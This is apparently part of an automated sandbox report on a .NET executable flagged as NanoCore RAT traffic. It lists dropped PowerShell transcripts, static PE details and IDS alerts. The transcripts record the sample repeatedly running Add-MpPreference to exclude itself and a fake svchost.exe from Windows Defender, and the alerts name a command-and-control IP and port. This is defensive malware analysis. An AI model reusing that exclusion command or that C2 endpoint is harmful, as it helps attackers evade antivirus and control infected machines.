                                                                                          Reputation:unknown
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927202808..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 340..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927202808..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..St
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.910646.IFp2s05x.20210927202733.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6107
                                                                                          Entropy (8bit):5.557951448459485
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZw/QNfZqDo1ZySZA/QNfZqDo1ZGbFdFTFjZB/QNfZqDo1ZjwFDFDFrZs:VqeqfJakhhA
                                                                                          MD5:52CC5469227037808F75795D5B0C69C3
                                                                                          SHA1:6D451586D0B133672A6664053704347D1B69C1B1
                                                                                          SHA-256:7D5D2DC17D1233CAC5B7C8676AFF61DFDB60ABB73C641AD52555E8C54D2E364C
                                                                                          SHA-512:944BFE4E77558479AB78A1EF4477254B29044D7F5DDF9CE0124FA0DBCA79EDC7FB678E763456802359B7714D6CEFA0070B747FDE8A87F34F3A09A4DB6BD441A3
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927202735..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 6648..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927202735..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..S
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.910646.J9PIXj6a.20210927202731.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5795
                                                                                          Entropy (8bit):5.398012434251356
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZG/QN0oqDo1ZdkZD/QN0oqDo1ZDF4Rn+RnQRnjZ8/QN0oqDo1Zm5RnARnARnQZT:4
                                                                                          MD5:511DC0FAAE2A3755535B5E22C767987C
                                                                                          SHA1:458FB17FC1CC136AD53164D868C1DE09B3A7C61D
                                                                                          SHA-256:24E67643C93621D2AECA0EDB32C88CFB1ABB3FA1EEFCB487A7C23740CA171D43
                                                                                          SHA-512:88895007B5C66CFB4744AA116ADD29D8844AE3E5433B55F8B2B352FE52C4D62A012788C4D1F22AF80C1D7FCADC9A982C91C5DB8FA30473C73A972EE603B5DB46
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927202733..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\s9SWgUgyO5.exe -Force..Process ID: 6588..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927202733..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\s9SWgUgyO5.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210927203108..Username: computer\user..RunAs User: computer\a
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.910646.JSwVICU1.20210927202749.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6107
                                                                                          Entropy (8bit):5.556460173627388
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZV/QNf8qDo1ZhSZK/QNf8qDo1ZXbFdFTFjZW/QNf8qDo1ZkwFDFDFSZp:GAUcfJz8hhM
                                                                                          MD5:D9283F8AF4383CB29D6E72132044C3A8
                                                                                          SHA1:F31E158B1796C4A30E052EEB258310EFB2885AC1
                                                                                          SHA-256:DD1D146D2655C496D8B349A439621B637872261EC08F996F410BAA8E4A719C0C
                                                                                          SHA-512:A49AA29CE1B517430C4574FC81EBF8081AF83E2195C2D03478F5996732B782B8B6E92D104AD8F697513F5808C468DBA9E77515879BC5305B92AC00C3B5D5DDF2
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927202750..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 3444..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927202750..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..S
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.910646.KdadWnHW.20210927202810.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6107
                                                                                          Entropy (8bit):5.5560714435202945
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZF/QNfaqDo1Z5SZ0/QNfaqDo1ZObFdFTFjZD/QNfaqDo1ZlwFDFDFVZG:GKWHfJ03hhA
                                                                                          MD5:FCDBE325B1C334BB0ECD8FE058190566
                                                                                          SHA1:F5E8A8CB68A4286EA778FEF664FF488149464FC6
                                                                                          SHA-256:09C085CC03CF9EC67979439CCB7A9C4D79767C95C17A384F2EF0ED1E7A6CED92
                                                                                          SHA-512:48C8CEE11A4BB415611095BB660DE16571A38E6167330C3B0082A6686874444D4B5BB2B49CF93FFD568B8C39A5A6653C259197D17C1ECED18B20AD27A27CE69A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927202813..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 2584..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927202813..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..S
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.910646.lgnlqOM5.20210927202750.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6107
                                                                                          Entropy (8bit):5.557448419714254
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZz/QNfXqDo1ZrSZk/QNfXqDo1ZabFdFTFjZW/QNfXqDo1ZgwFDFDFSZN:kxCEfJT5hhQ
                                                                                          MD5:B33D8E3FDD86D466C1393B89270B9DBA
                                                                                          SHA1:461CE14CC655C819D491DA7272F10B7EA5CB0841
                                                                                          SHA-256:29A44CB22A360E5056E844BF1000DD2855DBD4DFA345A029DB4DA80DBBEF485C
                                                                                          SHA-512:14ED5EE45C266373D775D5BE8AD49E1743B634906B5EC62260BAD6425C9E437185710CD9598D7B89C540D50FB7C41F6013558800EB4A9BC2C03DD7F173A75B1B
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927202752..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 2196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927202752..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..S
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.910646.mbVnUaXY.20210927202729.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6107
                                                                                          Entropy (8bit):5.5584622211197035
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZj/QNf0qDo1ZbSZr/QNf0qDo1ZxbFdFTFjZt/QNf0qDo1ZXwFDFDFEZz:c2fKfJO3hhE
                                                                                          MD5:F52F0EFEA4A7E14022408971F00E68BE
                                                                                          SHA1:46BFE866AD38F69ECF7495DADA181BAB26EA03A4
                                                                                          SHA-256:C3D05A08DB73D93980BA88D8C85C0E00A5C49C4493D04506C90E4F53EAE1D0DA
                                                                                          SHA-512:F80D50F9F659F3034A347965BA13B0847462EE48A2E3F1B25055A73A6CC14328E91B1A807D8B89922C931B2565FDD0DB6F1B9091185BFDD1063896BBDF528413
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927202730..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 6564..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927202730..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..S
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.910646.tfVce1MH.20210927202752.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6107
                                                                                          Entropy (8bit):5.556396924660695
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZB/QNfQqDo1ZNSZW/QNfQqDo1ZkbFdFTFjZW/QNfQqDo1ZbwFDFDFfZc:KYQDfJzbhhQ
                                                                                          MD5:CE43D849B1F84343977DCDD8635A3175
                                                                                          SHA1:E59F387AE69ACAB66219F0ED000343F5EDB00497
                                                                                          SHA-256:11675301952103FA14EC4BD870992DF9EA563E9307F5C54F4EC16C9292A027BF
                                                                                          SHA-512:CEDE652C1EFDD5EC06C55CA54A96CE44B99DABB6218C334C9881AB459DD606ED3C12475EF256553BEB1129A30C472DBB997D13FCD5EB4DE012F8AF05806278FE
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927202754..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 1752..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927202754..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..S
                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):55
                                                                                          Entropy (8bit):4.306461250274409
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):906
                                                                                          Entropy (8bit):3.135300474098327
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:58KRBubdpkoF1AG3r8wwrKk9+MlWlLehB4yAq7ejC1wwrH:OaqdmuF3r8h+kWReH4yJ7MEr
                                                                                          MD5:F70A278C781132E3BCAEB11BA07CCE65
                                                                                          SHA1:0B3CE6BF522324ABC5F06781911ABFDD5677B92F
                                                                                          SHA-256:2D0ADBF79FFE5A144E5ADE1B5481DF26A64CFE482048B46305316E142B9879AC
                                                                                          SHA-512:98A03113276DAF2EFF6F3F99C0077412BAC85705777781CD75ED6A39FAA4566A105A53D064FB36CAC4E6723F5F2E896C90F6798B6F6426DCC0A23FC42D61CF0A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. M.o.n. .. S.e.p. .. 2.7. .. 2.0.2.1. .2.0.:.2.9.:.0.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. M.o.n. .. S.e.p. .. 2.7. .. 2.0.2.1. .2.0.:.2.9.:.0.4.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):6.328607170068044
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:s9SWgUgyO5.exe
                                                                                          File size:31232
                                                                                          MD5:b462382cb954466386f9334247e0a34c
                                                                                          SHA1:0ac9e261eafc36f2d8a7bda5755b44c9d8c883e9
                                                                                          SHA256:6a19a144807268d406c6da55513ae24493b2d411ba8e2a2e15567d66e55d976b
                                                                                          SHA512:edf4ec1938ff467207c75e38b2bbea2445fec6accdcd325101a4e4b60e17c9041b3c9795cf100d194549372c60b07e143464181c63458fc8e753f384b2369f4a
                                                                                          SSDEEP:768:X1S7dO4lGn8pAw5sY0EIWCqgFDlZ8Lq7d:X1YbEnDwOEnCqMZF7d
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ALa.........."...P..n..........^.... ........@.. ....................................`................................

                                                                                          File Icon

                                                                                          Icon Hash:00828e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x408c5e
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:true
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                          Time Stamp:0x614C4111 [Thu Sep 23 08:55:45 2021 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Authenticode Signature

                                                                                          Signature Valid:
                                                                                          Signature Issuer:
                                                                                          Signature Validation Error:
                                                                                          Error Number:
                                                                                          Not Before, Not After
                                                                                            Subject Chain
                                                                                              Version:
                                                                                              Thumbprint MD5:
                                                                                              Thumbprint SHA-1:
                                                                                              Thumbprint SHA-256:
                                                                                              Serial:

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8c100x4b.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x6b0.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x7a000x13b8
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000x6c640x6e00False0.589808238636data6.47429613715IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0xa0000x6b00x800False0.3642578125data4.85217049993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0xc0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountry
                                                                                              RT_GROUP_ICON0xa0e80x6data
                                                                                              RT_VERSION0xa0f00x3d4dataEnglishUnited States
                                                                                              RT_MANIFEST0xa4c40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                              Imports

                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain

                                                                                              Version Infos

                                                                                              DescriptionData
                                                                                              LegalCopyrightAll Rights Reserved
                                                                                              Assembly Version6.156.348.530
                                                                                              InternalName.exe
                                                                                              FileVersion6.156.348.530
                                                                                              CompanyName Inc.
                                                                                              LegalTrademarks
                                                                                              Comments
                                                                                              ProductName
                                                                                              ProductVersion6.156.348.530
                                                                                              FileDescription
                                                                                              OriginalFilename.exe
                                                                                              Translation0x0000 0x0514

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              09/27/21-20:27:43.871459UDP254DNS SPOOF query response with TTL of 1 min. and no authority53617338.8.8.8192.168.2.5
                                                                                              09/27/21-20:27:44.161208TCP2025019ET TROJAN Possible NanoCore C2 60B497416746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:27:52.311806UDP254DNS SPOOF query response with TTL of 1 min. and no authority53524418.8.8.8192.168.2.5
                                                                                              09/27/21-20:27:52.965524TCP2025019ET TROJAN Possible NanoCore C2 60B497466746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:28:01.201808UDP254DNS SPOOF query response with TTL of 1 min. and no authority53631838.8.8.8192.168.2.5
                                                                                              09/27/21-20:28:01.689378TCP2025019ET TROJAN Possible NanoCore C2 60B497506746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:28:09.480817UDP254DNS SPOOF query response with TTL of 1 min. and no authority53569698.8.8.8192.168.2.5
                                                                                              09/27/21-20:28:09.716358TCP2025019ET TROJAN Possible NanoCore C2 60B497536746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:28:16.438183TCP2025019ET TROJAN Possible NanoCore C2 60B497546746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:28:24.251269TCP2025019ET TROJAN Possible NanoCore C2 60B497566746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:28:31.214794TCP2025019ET TROJAN Possible NanoCore C2 60B497586746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:28:37.800654UDP254DNS SPOOF query response with TTL of 1 min. and no authority53643458.8.8.8192.168.2.5
                                                                                              09/27/21-20:28:38.091714TCP2025019ET TROJAN Possible NanoCore C2 60B497596746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:28:44.803365UDP254DNS SPOOF query response with TTL of 1 min. and no authority53571288.8.8.8192.168.2.5
                                                                                              09/27/21-20:28:45.000951TCP2025019ET TROJAN Possible NanoCore C2 60B497606746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:28:51.904228TCP2025019ET TROJAN Possible NanoCore C2 60B497616746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:28:56.969219TCP2025019ET TROJAN Possible NanoCore C2 60B497626746192.168.2.5194.147.140.25
